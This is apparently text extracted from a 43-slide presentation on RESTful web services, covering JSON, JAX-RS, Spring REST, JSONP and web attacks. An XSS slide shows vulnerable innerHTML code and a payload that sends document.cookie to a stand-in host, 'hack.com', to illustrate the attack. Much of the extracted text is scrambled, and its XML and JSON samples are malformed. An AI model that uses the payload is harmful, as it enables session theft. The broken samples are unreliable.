Restful Web Services By Loukik Purohit Rohit Ghatol
Restful Web Services By Loukik Purohit & Rohit Ghatol
Restful Web Service Browser Messages(xml/json ) Desktop Mobile Cric. Info
Restful Using Browser Cab Booking Plane Booking Hotel Booking User Intervention Vacation Subsystem
Restful Automated Cab Booking Plane Booking SMS/ Email Machines interacting with each other Hotel Booking Vacation Subsystem
Restful Rest in terms of Layman HR Accounts Admin
Restful Organized structure To get address of user 1 , go to : OrganisationUsers1address
Restful Same analogy applies to Web • Request to get all users http: //xyz. com/users • Request to get user 1 http: //xyz. com/users/1 • Request to get address of user 1 http: //xyz. com/users/1/address
Restful Request-Response GET Request GET /users/1 HTTP/1. 1 Host: xyz. com Accept: application/xml GET Response <users> <id>1</id> <name>Loukik</address> <address>Pune</address> <skill>java</skill> </id> <id>2</id> <name>. . . </address> <address>…</address> <skill>…</skill> </id> </users>
Restful Request-Response POST Request GET /users HTTP/1. 1 Host: xyz. com Content Type: application/xml Accept: application/xml <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users> POST Response <result> <id>3</id> </result>
Restful HTTP http: //xyz. com/services/users HTTP Headers Method: PUT Accept: application/xml Content-Type: application/xml HTTP Body <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users>
Restful Four verbs for every noun GET PU T POST DELETE • http: //example. com/customer/123
Restful JSON Can Data be Represented in form of List and a Map? ? Here’s JSON var my. Object = eval('(' + my. JSONtext + ')');
Restful JSON Parser
Restful How JSON looks like var result= { "users": [{ "id": "1", "name": "loukik", "address": "Pune", "skill": "java" }, { "id": "2", "name": "rohit", "address": "Pune", "skill": "C++“ } ] } Accessing json in javascript code result. users[0]. name=“loukik”
Restful REST
Restful Programmable Web Your Source to 3000+ Web Service APIs
Restful programmableweb. com
Restful Implement Restful Webservice Write a Servlet Implement do. Get, do. Post, do. Delete Write business logic Create your Messages, that too JSON
Restful JAX-RS To rescue Marrying to API Servlet EJB Being POJO (Single) is Great! JAX-RS
Restful JAX-RS S R X- A J : 11 3 R JS More info at http: //java. sun. com/javaee/6/docs/tutorial/doc/giep u. html
Restful JAX-RS Flow HTTP Request JSON JAXB@XMLRoot. Elem ent JAX-RS Servlet HTTP Response JSON POJO Model Business Logic POJO Model
Restful Spring REST • Based on Spring MVC
Restful Spring REST Negotiated viewbased rendering HTTP message converters
Restful Enunciate Your Web service API + Full HTML documentation + Client-side libraries
Restful Java Doc C JAX-RS Obj. C Client Comm SOAP . Net POJO GWT AMF Java Json What does Enunciate do for me?
Restful Enunciate • Enunciate is an engine for dramatically enhancing your Java Web service API. • Enunciate is primarily a build-time tool. • Develop your Web service API. • Attach Enunciate to your build process.
Restful Cross Site Scripting Single Origin Policy http: //geochirp. com maps. google. com Ajax Calls twitter. com
Restful e l g in S Ajax Restrictions n gi i r O y c i l Po Imp osed by B row ser Accessing i. Frame’s DOM http: //www. abc. com ABC. com Java. Script http: //xyz. com Iframe XYZ. com
Restful So How to do Mashups? Use http: //geochirp. com/proxy Pro http: //geochirp. com maps. google. com P R O X Y twitter. com xy
Restful So How to do Mashups? Use JSONP http: //geochirp. com all ONP C JS maps. google. com JSO NP Call twitter. com
Restful What is JSONP? ABC. com Sta tic Scr ipt http: //xyz. com/script. js XYZ. com AJAX Call Not Allowed By Browser XYZ. com JS Including Scripts hosted on other domains is allowed
Restful What is JSONP? ABC. com ipt r c S c mi Dyna http: //xyz. com/services/ users/1? callback=myfun XYZ. com AJAX Call Not Allowed By Browser XYZ. com JS Including Scripts hosted on other domains is allowed
Restful JSONP Explained http: //xyz. com/services/users/1? callback=myfunc JSON { } "id": "1", "name": "loukik", "address": "Pune", "skill": "java“ e l g Sin n i g i Or JSONP y c i l Po myfunc({ "id": "1", "name": "loukik", "address": "Pune", "skill": "java“ }); No h c u S n o i t ric t s Re
Restful JSONP Code Example
<html> <head> <script> function myfunc(data){ table. update(data); } </script> </head> <body> <table> <!-- employee table --> <tr><td>Name </td><td> Address </td><td> Role</td></tr> <tr><td>Rohit </td><td> Pune </td><td> Architect</td></tr> <tr><td>Loukik </td><td> Pune </td><td>Geek</td></tr> </table> <button id="add employee" >Add </button> <button id="next 100" >NExt 100</button> <script src="http: //xyz. com/services/fetchemployess? page=1&jsonp=myfunc"></script> </body> </html> Restful
Restful XSS Attacker <script> attack script</script> Login Hacked!!! User Scrap. Book Web. Site
Restful
Restful How to do XSS? S XS n a eds ity e n er bil v a r r e e S Vuln What if I put an html with some Java. Script here? S. in ay De ne r. HT v use ML s in c od e div Text. Area function post. Scrap(){ div. inner. HTML = textarea. value; } DIV Post
Restful How to do XSS? S XS n a eds ity e n er bil v a r r e e S Vuln S. in ay De ne r. HT v use ML s in c od e div function post. Scrap(){ div. inner. HTML = textarea. value; } <h 1>Look at this cool image</h 1> <img src='http: //hack. com/? cookie=" + encode. URI(document. cookie)'> </img>
Restful XSRF • Cross Site Request Forgery. • Unauthorized commands are transmitted from a user that the website trusts. • Exploits the trust that a site has in a user's browser.
Restful XSRF User Login Opens Mail Send Mail with Script Scrap. Book Web. Site Hacked!!! Attacker
Restful How to do XSRF r you lds o h ser ions w o Br sess Wh wh at if I ich m use ade s y you ou v ha r ses isit a ck? sio n t page od o Is it Possible?
Restful Aye Mate! How come I can use Google + and Facebook Like here?
- Slides: 43
